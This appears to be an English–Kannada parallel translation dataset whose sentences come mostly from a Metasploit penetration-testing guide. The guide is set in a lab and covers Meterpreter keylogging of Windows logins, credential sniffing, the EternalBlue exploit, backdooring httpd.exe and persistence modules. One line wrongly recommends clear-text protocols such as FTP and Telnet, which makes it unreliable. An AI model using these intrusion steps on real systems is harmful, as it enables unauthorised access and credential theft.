| {"en":"Subnetwork or subnet is the concept of dividing a large network into smaller, identifiable parts.","translation":"ಸಬ್ನೆಟ್ವರ್ಕ್ ಅಥವಾ ಸಬ್ನೆಟ್ ಎಂದರೆ ದೊಡ್ಡ ನೆಟ್ವರ್ಕ್ ಅನ್ನು ಸಣ್ಣ, ಗುರುತಿಸಬಹುದಾದ ಭಾಗಗಳಾಗಿ ವಿಭಜಿಸುವ ಪರಿಕಲ್ಪನೆಯಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"A netmask is a 32-bit mask that is used to divide an IP address into subnets and specify the network's available hosts.","translation":"ನೆಟ್ಮಾಸ್ಕ್ ಎನ್ನುವುದು 32-ಬಿಟ್ ಮಾಸ್ಕ್ ಆಗಿದ್ದು, ಇದನ್ನು IP ವಿಳಾಸವನ್ನು ಸಬ್ನೆಟ್ಗಳಾಗಿ ವಿಭಜಿಸಲು ಮತ್ತು ನೆಟ್ವರ್ಕ್ನ ಲಭ್ಯವಿರುವ ಹೋಸ್ಟ್ಗಳನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಲು ಬಳಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The gateway specifies the forwarding or the next hop IP address over which the set of addresses defined by the network destination and subnet mask are reachable.","translation":"ಗೇಟ್ವೇ ಫಾರ್ವರ್ಡ್ ಮಾಡುವ ಅಥವಾ ನೆಟ್ವರ್ಕ್ ಗಮ್ಯಸ್ಥಾನ ಮತ್ತು ಸಬ್ನೆಟ್ ಮಾಸ್ಕ್ನಿಂದ ವ್ಯಾಖ್ಯಾನಿಸಲಾದ ವಿಳಾಸಗಳ ಸೆಟ್ ಅನ್ನು ತಲುಪಬಹುದಾದ ಮುಂದಿನ ಹಾಪ್ IP ವಿಳಾಸವನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"There are several networking commands provided by Meterpreter, which we can display using the help command followed by net for the network.","translation":"ಮೀಟರ್ಪ್ರಿಟರ್ನಿಂದ ಒದಗಿಸಲಾದ ಹಲವಾರು ನೆಟ್ವರ್ಕಿಂಗ್ ಆಜ್ಞೆಗಳಿವೆ, ಇದನ್ನು ನೆಟ್ವರ್ಕ್ಗಾಗಿ ನೆಟ್ ನಂತರ ಸಹಾಯ ಆಜ್ಞೆಯನ್ನು ಬಳಸಿಕೊಂಡು ನಾವು ಪ್ರದರ್ಶಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"If you have to sniff the keystrokes from the Default desktop, you will have to make sure that your current Meterpreter active browser is set to Session 0/WinSta0/Default.","translation":"ನೀವು ಡೀಫಾಲ್ಟ್ ಡೆಸ್ಕ್ಟಾಪ್ನಿಂದ ಕೀಸ್ಟ್ರೋಕ್ಗಳನ್ನು ಸ್ನಿಫ್ ಮಾಡಬೇಕಾದರೆ, ನಿಮ್ಮ ಪ್ರಸ್ತುತ ಮೀಟರ್ಪ್ರಿಟರ್ ಸಕ್ರಿಯ ಬ್ರೌಸರ್ ಸೆಷನ್ 0/WinSta0/Default ಗೆ ಹೊಂದಿಸಲಾಗಿದೆ ಎಂದು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳಬೇಕು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's check our current desktop using the getdesktop command.","translation":"getdesktop ಆಜ್ಞೆಯನ್ನು ಬಳಸಿಕೊಂಡು ನಮ್ಮ ಪ್ರಸ್ತುತ ಡೆಸ್ಕ್ಟಾಪ್ ಅನ್ನು ಪರಿಶೀಲಿಸೋಣ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"So, if we run a keystroke capture here, it won't return any result.","translation":"ಆದ್ದರಿಂದ, ನಾವು ಇಲ್ಲಿ ಕೀಸ್ಟ್ರೋಕ್ ಕ್ಯಾಪ್ಚರ್ ಅನ್ನು ರನ್ ಮಾಡಿದರೆ, ಅದು ಯಾವುದೇ ಫಲಿತಾಂಶವನ್ನು ನೀಡುವುದಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's change our desktop to WinSta0\\Default.","translation":"ನಮ್ಮ ಡೆಸ್ಕ್ಟಾಪ್ ಅನ್ನು WinSta0\\Default ಗೆ ಬದಲಾಯಿಸೋಣ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"So, now we are ready to run a keystroke sniffer to capture the keys pressed by the user on the target machine.","translation":"ಆದ್ದರಿಂದ, ಈಗ ನಾವು ಗುರಿ ಯಂತ್ರದಲ್ಲಿ ಬಳಕೆದಾರರು ಒತ್ತಿದ ಕೀಲಿಗಳನ್ನು ಸೆರೆಹಿಡಿಯಲು ಕೀಸ್ಟ್ರೋಕ್ ಸ್ನಿಫರ್ ಅನ್ನು ರನ್ ಮಾಡಲು ಸಿದ್ಧರಾಗಿದ್ದೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Dumping captured keystrokes... gmail.com<CR> demouser<Right Shift>@gmail.com<CR> <Right Shift>P4ssw0rd<CR>","translation":"ಸೆರೆಹಿಡಿಯಲಾದ ಕೀಸ್ಟ್ರೋಕ್ಗಳನ್ನು ಡಂಪ್ ಮಾಡಲಾಗುತ್ತಿದೆ... gmail.com<CR> demouser<Right Shift>@gmail.com<CR> <Right Shift>P4ssw0rd<CR>","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"What if you want to sniff the Windows login password?","translation":"ನೀವು ವಿಂಡೋಸ್ ಲಾಗಿನ್ ಪಾಸ್ವರ್ಡ್ ಅನ್ನು ಸ್ನಿಫ್ ಮಾಡಲು ಬಯಸಿದರೆ ಏನು?","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"We can migrate to a process which runs during the Windows login.","translation":"ನಾವು ವಿಂಡೋಸ್ ಲಾಗಿನ್ ಸಮಯದಲ್ಲಿ ಚಲಿಸುವ ಪ್ರಕ್ರಿಯೆಗೆ ವಲಸೆ ಹೋಗಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's execute the ps command to check the running processes.","translation":"ಚಾಲನೆಯಲ್ಲಿರುವ ಪ್ರಕ್ರಿಯೆಗಳನ್ನು ಪರಿಶೀಲಿಸಲು ps ಆಜ್ಞೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸೋಣ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"You will find winlogon.exe running as a process with a process ID.","translation":"ನೀವು winlogon.exe ಪ್ರಕ್ರಿಯೆಯ ID ಯೊಂದಿಗೆ ಪ್ರಕ್ರಿಯೆಯಾಗಿ ಚಾಲನೆಯಲ್ಲಿರುವುದನ್ನು ಕಾಣಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Now, let's migrate to this PID and check our active desktop again.","translation":"ಈಗ, ಈ PID ಗೆ ವಲಸೆ ಹೋಗೋಣ ಮತ್ತು ನಮ್ಮ ಸಕ್ರಿಯ ಡೆಸ್ಕ್ಟಾಪ್ ಅನ್ನು ಮತ್ತೆ ಪರಿಶೀಲಿಸೋಣ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"You can see that our active desktop has changed to WinSta0\\Winlogon.","translation":"ನಮ್ಮ ಸಕ್ರಿಯ ಡೆಸ್ಕ್ಟಾಪ್ WinSta0\\Winlogon ಗೆ ಬದಲಾಗಿದೆ ಎಂದು ನೀವು ನೋಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"To capture the login password, log into the Metasploitable 3 machine and then use the keyscan_dump Meterpreter command to dump the keystrokes.","translation":"ಲಾಗಿನ್ ಪಾಸ್ವರ್ಡ್ ಅನ್ನು ಸೆರೆಹಿಡಿಯಲು, Metasploitable 3 ಯಂತ್ರಕ್ಕೆ ಲಾಗ್ ಇನ್ ಮಾಡಿ ಮತ್ತು ನಂತರ ಕೀಸ್ಟ್ರೋಕ್ಗಳನ್ನು ಡಂಪ್ ಮಾಡಲು keyscan_dump Meterpreter ಆಜ್ಞೆಯನ್ನು ಬಳಸಿ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Similarly, we can get back to the Default desktop by migrating to any process which is running on the default desktop; for example, explorer.exe.","translation":"ಅದೇ ರೀತಿ, ಡೀಫಾಲ್ಟ್ ಡೆಸ್ಕ್ಟಾಪ್ನಲ್ಲಿ ಚಾಲನೆಯಲ್ಲಿರುವ ಯಾವುದೇ ಪ್ರಕ್ರಿಯೆಗೆ ವಲಸೆ ಹೋಗುವ ಮೂಲಕ ನಾವು ಡೀಫಾಲ್ಟ್ ಡೆಸ್ಕ್ಟಾಪ್ಗೆ ಮರಳಬಹುದು; ಉದಾಹರಣೆಗೆ, explorer.exe.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Generally, people do not get any results when they directly run keyscan without having a look at the current active desktop.","translation":"ಸಾಮಾನ್ಯವಾಗಿ, ಪ್ರಸ್ತುತ ಸಕ್ರಿಯ ಡೆಸ್ಕ್ಟಾಪ್ ಅನ್ನು ನೋಡದೆ ಕೀಸ್ಕಾನ್ ಅನ್ನು ನೇರವಾಗಿ ರನ್ ಮಾಡಿದಾಗ ಜನರು ಯಾವುದೇ ಫಲಿತಾಂಶಗಳನ್ನು ಪಡೆಯುವುದಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"This is because the process they have penetrated might belong to a different session or station.","translation":"ಏಕೆಂದರೆ ಅವರು ಪ್ರವೇಶಿಸಿದ ಪ್ರಕ್ರಿಯೆಯು ವಿಭಿನ್ನ ಸೆಷನ್ ಅಥವಾ ನಿಲ್ದಾಣಕ್ಕೆ ಸೇರಿರಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"So keep this concept in mind while working with keystroke sniffing.","translation":"ಆದ್ದರಿಂದ ಕೀಸ್ಟ್ರೋಕ್ ಸ್ನಿಫಿಂಗ್ನೊಂದಿಗೆ ಕೆಲಸ ಮಾಡುವಾಗ ಈ ಪರಿಕಲ್ಪನೆಯನ್ನು ನೆನಪಿನಲ್ಲಿಡಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Once we are in a Meterpreter session, you can simply take some screenshots using the screenshot command.","translation":"ನಾವು ಮೀಟರ್ಪ್ರಿಟರ್ ಸೆಷನ್ನಲ್ಲಿದ್ದಾಗ, ನೀವು ಸ್ಕ್ರೀನ್ಶಾಟ್ ಆಜ್ಞೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಕೆಲವು ಸ್ಕ್ರೀನ್ಶಾಟ್ಗಳನ್ನು ತೆಗೆದುಕೊಳ್ಳಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Using a scraper Meterpreter script","translation":"ಸ್ಕ್ರೇಪರ್ ಮೀಟರ್ಪ್ರಿಟರ್ ಸ್ಕ್ರಿಪ್ಟ್ ಬಳಸುವುದು","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Penetration testing might require a lot of time to dig out information on the target.","translation":"ಪ್ರವೇಶ ಪರೀಕ್ಷೆಗೆ ಗುರಿಯ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಹೊರತೆಗೆಯಲು ಬಹಳ ಸಮಯ ಬೇಕಾಗಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To generate some traffic, we will log in to the Metasploitable 3 machine.","translation":"ಕೆಲವು ದಟ್ಟಣೆಯನ್ನು ಉತ್ಪಾದಿಸಲು, ನಾವು ಮೆಟಾಸ್ಪ್ಲೋಯಿಟೇಬಲ್ 3 ಯಂತ್ರಕ್ಕೆ ಲಾಗ್ ಇನ್ ಆಗುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Then, we will stop the sniffer using the sniffer_stop 3 command.","translation":"ನಂತರ, ನಾವು ಸ್ನಿಫರ್_ಸ್ಟಾಪ್ 3 ಆಜ್ಞೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಸ್ನಿಫರ್ ಅನ್ನು ನಿಲ್ಲಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Download or release them using 'sniffer_dump' or 'sniffer_release'.","translation":"'ಸ್ನಿಫರ್_ಡಂಪ್' ಅಥವಾ 'ಸ್ನಿಫರ್_ರಿಲೀಸ್' ಬಳಸಿ ಅವುಗಳನ್ನು ಡೌನ್ಲೋಡ್ ಮಾಡಿ ಅಥವಾ ಬಿಡುಗಡೆ ಮಾಡಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Download the PCAP using the sniffer_dump 3 command.","translation":"ಸ್ನಿಫರ್_ಡಂಪ್ 3 ಆಜ್ಞೆಯನ್ನು ಬಳಸಿಕೊಂಡು PCAP ಅನ್ನು ಡೌನ್ಲೋಡ್ ಮಾಡಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Now that we have the PCAP file, we can use tcpdump, a packet analyzer command-line tool.","translation":"ಈಗ ನಮ್ಮಲ್ಲಿ PCAP ಫೈಲ್ ಇದೆ, ನಾವು ಪ್ಯಾಕೆಟ್ ವಿಶ್ಲೇಷಕ ಕಮಾಂಡ್-ಲೈನ್ ಟೂಲ್ ಆದ ಟಿಸಿಪಿಡಂಪ್ ಅನ್ನು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Looking at the output, we can see that we were able to capture the FTP credentials.","translation":"ಔಟ್ಪುಟ್ ಅನ್ನು ನೋಡುವಾಗ, ನಾವು FTP ರುಜುವಾತುಗಳನ್ನು ಸೆರೆಹಿಡಿಯಲು ಸಾಧ್ಯವಾಯಿತು ಎಂದು ನಾವು ನೋಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"This is the reason why you should use clear text protocols, such as FTP and Telnet.","translation":"ನೀವು FTP ಮತ್ತು ಟೆಲ್ನೆಟ್ನಂತಹ ಸ್ಪಷ್ಟ ಪಠ್ಯ ಪ್ರೋಟೋಕಾಲ್ಗಳನ್ನು ಏಕೆ ಬಳಸಬೇಕು ಎಂಬುದಕ್ಕೆ ಇದು ಕಾರಣವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"In the previous two chapters, we learned extensively about using Meterpreter.","translation":"ಹಿಂದಿನ ಎರಡು ಅಧ್ಯಾಯಗಳಲ್ಲಿ, ಮೀಟರ್ಪ್ರಿಟರ್ ಅನ್ನು ಬಳಸುವುದರ ಬಗ್ಗೆ ನಾವು ವಿಸ್ತಾರವಾಗಿ ಕಲಿತಿದ್ದೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"From a penetration tester's point of view, it is essential to know how to implement our own scripting techniques.","translation":"ಒಬ್ಬ ನುಗ್ಗುವ ಪರೀಕ್ಷಕನ ದೃಷ್ಟಿಕೋನದಿಂದ, ನಮ್ಮದೇ ಆದ ಸ್ಕ್ರಿಪ್ಟಿಂಗ್ ತಂತ್ರಗಳನ್ನು ಹೇಗೆ ಕಾರ್ಯಗತಗೊಳಿಸಬೇಕೆಂದು ತಿಳಿದುಕೊಳ್ಳುವುದು ಅತ್ಯಗತ್ಯ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"There can be situations when you have to perform tasks where Meterpreter may not be enough.","translation":"ನೀವು ಮೀಟರ್ಪ್ರಿಟರ್ ಸಾಕಾಗದೇ ಇರುವ ಕಾರ್ಯಗಳನ್ನು ನಿರ್ವಹಿಸಬೇಕಾದ ಸಂದರ್ಭಗಳು ಇರಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"This is where developing our own scripts and modules come in handy.","translation":"ಇಲ್ಲಿಯೇ ನಮ್ಮದೇ ಆದ ಸ್ಕ್ರಿಪ್ಟ್ಗಳು ಮತ್ತು ಮಾಡ್ಯೂಲ್ಗಳನ್ನು ಅಭಿವೃದ್ಧಿಪಡಿಸುವುದು ಉಪಯುಕ್ತವಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The Meterpreter API can be helpful for programmers to implement their own scripts.","translation":"ಪ್ರೋಗ್ರಾಮರ್ಗಳು ತಮ್ಮದೇ ಆದ ಸ್ಕ್ರಿಪ್ಟ್ಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಮೀಟರ್ಪ್ರಿಟರ್ API ಸಹಾಯಕವಾಗಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"We will be dealing with Ruby scripts in the next few recipes.","translation":"ಮುಂದಿನ ಕೆಲವು ಪಾಕವಿಧಾನಗಳಲ್ಲಿ ನಾವು ರೂಬಿ ಸ್ಕ್ರಿಪ್ಟ್ಗಳೊಂದಿಗೆ ವ್ಯವಹರಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Let's start by launching an interactive Ruby shell with Meterpreter.","translation":"ಮೀಟರ್ಪ್ರಿಟರ್ನೊಂದಿಗೆ ಸಂವಾದಾತ್ಮಕ ರೂಬಿ ಶೆಲ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸುವ ಮೂಲಕ ಪ್ರಾರಂಭಿಸೋಣ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Now that we are in the Ruby shell, we can execute our Ruby scripts.","translation":"ನಾವು ಈಗ ರೂಬಿ ಶೆಲ್ನಲ್ಲಿದ್ದೇವೆ, ನಾವು ನಮ್ಮ ರೂಬಿ ಸ್ಕ್ರಿಪ್ಟ್ಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Let's use the framework object and display information about our session.","translation":"ನಮ್ಮ ಸೆಷನ್ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಪ್ರದರ್ಶಿಸಲು ಫ್ರೇಮ್ವರ್ಕ್ ಆಬ್ಜೆಕ್ಟ್ ಅನ್ನು ಬಳಸೋಣ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Use client to display information about our target machine.","translation":"ನಮ್ಮ ಟಾರ್ಗೆಟ್ ಯಂತ್ರದ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಪ್ರದರ್ಶಿಸಲು ಕ್ಲೈಂಟ್ ಬಳಸಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"This call will print the output and add a carriage return at the end.","translation":"ಈ ಕರೆ ಔಟ್ಪುಟ್ ಅನ್ನು ಮುದ್ರಿಸುತ್ತದೆ ಮತ್ತು ಕೊನೆಯಲ್ಲಿ ಕ್ಯಾರೇಜ್ ರಿಟರ್ನ್ ಅನ್ನು ಸೇರಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Railgun is an extension for Meterpreter that allows us to make calls to a Windows API.","translation":"ರೈಲ್ಗನ್ ಮೀಟರ್ಪ್ರಿಟರ್ನ ವಿಸ್ತರಣೆಯಾಗಿದ್ದು, ವಿಂಡೋಸ್ API ಗೆ ಕರೆಗಳನ್ನು ಮಾಡಲು ನಮಗೆ ಅನುಮತಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Suppose we want to make remote API calls on the victim machine; what is the simplest method?","translation":"ನಾವು ಬಲಿಪಶು ಯಂತ್ರದಲ್ಲಿ ರಿಮೋಟ್ API ಕರೆಗಳನ್ನು ಮಾಡಲು ಬಯಸುತ್ತೇವೆ ಎಂದು ಭಾವಿಸೋಣ; ಸರಳ ವಿಧಾನ ಯಾವುದು?","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Checking target architecture...","translation":"ಗುರಿ ವಾಸ್ತುಶಿಲ್ಪವನ್ನು ಪರಿಶೀಲಿಸಲಾಗುತ್ತಿದೆ...","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Since the target doesn't have a root password, it is possible to use the MySQL service to upload a shell and gain remote access to the system.","translation":"ಗುರಿಯು ರೂಟ್ ಪಾಸ್ವರ್ಡ್ ಹೊಂದಿಲ್ಲದ ಕಾರಣ, ಶೆಲ್ ಅನ್ನು ಅಪ್ಲೋಡ್ ಮಾಡಲು ಮತ್ತು ಸಿಸ್ಟಮ್ಗೆ ರಿಮೋಟ್ ಪ್ರವೇಶವನ್ನು ಪಡೆಯಲು MySQL ಸೇವೆಯನ್ನು ಬಳಸುವುದು ಸಾಧ್ಯ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"This vulnerability affects Windows machines without security update MS17-010 for Microsoft Windows SMB Server SMBv1 Server.","translation":"ಈ ದೌರ್ಬಲ್ಯವು ಮೈಕ್ರೋಸಾಫ್ಟ್ ವಿಂಡೋಸ್ SMB ಸರ್ವರ್ SMBv1 ಸರ್ವರ್ಗಾಗಿ MS17-010 ಭದ್ರತಾ ನವೀಕರಣವಿಲ್ಲದ ವಿಂಡೋಸ್ ಯಂತ್ರಗಳ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To launch the exploit, use the MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit module, set the target IP address, use a meterpreter reverse TCP payload, and specify the listening address.","translation":"ಶೋಷಣವನ್ನು ಪ್ರಾರಂಭಿಸಲು, MS17-010 ಎಟರ್ನಲ್ಬ್ಲೂ SMB ರಿಮೋಟ್ ವಿಂಡೋಸ್ ಕರ್ನಲ್ ಪೂಲ್ ಭ್ರಷ್ಟಾಚಾರ ಶೋಷಣೆ ಮಾಡ್ಯೂಲ್ ಬಳಸಿ, ಗುರಿ IP ವಿಳಾಸವನ್ನು ಹೊಂದಿಸಿ, ಮೀಟರ್ಪ್ರಿಟರ್ ರಿವರ್ಸ್ TCP ಪೇಲೋಡ್ ಬಳಸಿ ಮತ್ತು ಆಲಿಸುವ ವಿಳಾಸವನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಿ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"One outcome of a penetration test that differentiates it from a vulnerability scanner, is that no one will state that what you've found is a false positive when you present them with a screenshot of a shell running on the target system.","translation":"ಒಂದು ನುಗ್ಗುವ ಪರೀಕ್ಷೆಯ ಫಲಿತಾಂಶವು ದೌರ್ಬಲ್ಯ ಸ್ಕ್ಯಾನರ್ನಿಂದ ಅದನ್ನು ಪ್ರತ್ಯೇಕಿಸುತ್ತದೆ, ಅಂದರೆ ಗುರಿ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಚಾಲನೆಯಲ್ಲಿರುವ ಶೆಲ್ನ ಸ್ಕ್ರೀನ್ಶಾಟ್ ಅನ್ನು ನೀವು ಪ್ರಸ್ತುತಪಡಿಸಿದಾಗ ನೀವು ಕಂಡುಹಿಡಿದದ್ದು ಸುಳ್ಳು ಧನಾತ್ಮಕವಾಗಿದೆ ಎಂದು ಯಾರೂ ಹೇಳುವುದಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Having a shell on the target system is great, but sometimes it is not enough.","translation":"ಗುರಿ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಶೆಲ್ ಅನ್ನು ಹೊಂದಿರುವುದು ಉತ್ತಮ, ಆದರೆ ಕೆಲವೊಮ್ಮೆ ಅದು ಸಾಕಾಗುವುದಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"With a backdoor, we will be able to ensure persistence and get access to the system, even if the vulnerability gets patched.","translation":"ಬ್ಯಾಕ್ಡೋರ್ನೊಂದಿಗೆ, ದೌರ್ಬಲ್ಯವನ್ನು ಪ್ಯಾಚ್ ಮಾಡಿದರೂ ಸಹ, ನಾವು ಸ್ಥಿರತೆಯನ್ನು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳಲು ಮತ್ತು ಸಿಸ್ಟಮ್ಗೆ ಪ್ರವೇಶ ಪಡೆಯಲು ಸಾಧ್ಯವಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Since we cannot backdoor a binary while it is running, the first thing we need to do is to kill the Apache process (httpd.exe), using the kill command followed by the PID of the process:","translation":"ನಾವು ಬೈನರಿಯನ್ನು ಚಾಲನೆಯಲ್ಲಿರುವಾಗ ಬ್ಯಾಕ್ಡೋರ್ ಮಾಡಲು ಸಾಧ್ಯವಿಲ್ಲದ ಕಾರಣ, ನಾವು ಮಾಡಬೇಕಾದ ಮೊದಲನೆಯದು ಅಪಾಚೆ ಪ್ರಕ್ರಿಯೆಯನ್ನು (httpd.exe) ಕೊಲ್ಲುವುದು, ಕೊಲ್ಲುವ ಆಜ್ಞೆಯನ್ನು ಬಳಸಿ ಪ್ರಕ್ರಿಯೆಯ PID ಅನ್ನು ಅನುಸರಿಸಿ:","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Now that we have the backdoor ready, we need to start a listener for the reverse connection; for that we will use the Generic Payload Handler:","translation":"ಈಗ ನಾವು ಬ್ಯಾಕ್ಡೋರ್ ಅನ್ನು ಸಿದ್ಧಪಡಿಸಿದ್ದೇವೆ, ನಾವು ರಿವರ್ಸ್ ಸಂಪರ್ಕಕ್ಕಾಗಿ ಕೇಳುಗರನ್ನು ಪ್ರಾರಂಭಿಸಬೇಕಾಗಿದೆ; ಅದಕ್ಕಾಗಿ ನಾವು ಜೆನೆರಿಕ್ ಪೇಲೋಡ್ ಹ್ಯಾಂಡ್ಲರ್ ಅನ್ನು ಬಳಸುತ್ತೇವೆ:","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Back in the session, we will rename the httpd.exe file to httpd.exe.backup, upload the backdoored version, and rename it to httpd.exe:","translation":"ಸೆಷನ್ನಲ್ಲಿ ಹಿಂತಿರುಗಿ, ನಾವು httpd.exe ಫೈಲ್ ಅನ್ನು httpd.exe.backup ಎಂದು ಮರುಹೆಸರಿಸುತ್ತೇವೆ, ಬ್ಯಾಕ್ಡೋರ್ಡ್ ಆವೃತ್ತಿಯನ್ನು ಅಪ್ಲೋಡ್ ಮಾಡುತ್ತೇವೆ ಮತ್ತು ಅದನ್ನು httpd.exe ಎಂದು ಮರುಹೆಸರಿಸುತ್ತೇವೆ:","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To use the Windows Registry Only Persistence module, we need to specify the session to run the module on, in this case, session 1 with what we got from the MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit; set the payload; set the listening IP address; and use the exploit command to launch the exploit:","translation":"ವಿಂಡೋಸ್ ರಿಜಿಸ್ಟ್ರಿ ಓನ್ಲಿ ಪರ್ಸಿಸ್ಟೆನ್ಸ್ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಬಳಸಲು, ನಾವು ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಚಲಾಯಿಸಲು ಸೆಷನ್ ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಬೇಕಾಗಿದೆ, ಈ ಸಂದರ್ಭದಲ್ಲಿ, MS17-010 ಎಟರ್ನಲ್ಬ್ಲೂ SMB ರಿಮೋಟ್ ವಿಂಡೋಸ್ ಕರ್ನಲ್ ಪೂಲ್ ಭ್ರಷ್ಟಾಚಾರ ಶೋಷಣದಿಂದ ನಾವು ಪಡೆದ ಸೆಷನ್ 1; ಪೇಲೋಡ್ ಅನ್ನು ಹೊಂದಿಸಿ; ಆಲಿಸುವ IP ವಿಳಾಸವನ್ನು ಹೊಂದಿಸಿ; ಮತ್ತು ಶೋಷಣವನ್ನು ಪ್ರಾರಂಭಿಸಲು ಶೋಷಣೆ ಆಜ್ಞೆಯನ್ನು ಬಳಸಿ:","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"To trigger the exploit, simply reboot the Metasploitable 3 machine and we will get a new session:","translation":"ಶೋಷಣವನ್ನು ಪ್ರಚೋದಿಸಲು, ಮೆಟಾಸ್ಪ್ಲೋಯಿಟೇಬಲ್ 3 ಯಂತ್ರವನ್ನು ಮರುಪ್ರಾರಂಭಿಸಿ ಮತ್ತು ನಾವು ಹೊಸ ಸೆಷನ್ ಅನ್ನು ಪಡೆಯುತ್ತೇವೆ:","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"To use the WMI Event Subscription Persistence local exploit module, we first need to specify the session to run the module on.","translation":"WMI ಈವೆಂಟ್ ಚಂದಾದಾರಿಕೆ ಪರ್ಸಿಸ್ಟೆನ್ಸ್ ಸ್ಥಳೀಯ ಶೋಷಣೆ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಬಳಸಲು, ನಾವು ಮೊದಲು ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಚಲಾಯಿಸಲು ಸೆಷನ್ ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಬೇಕಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
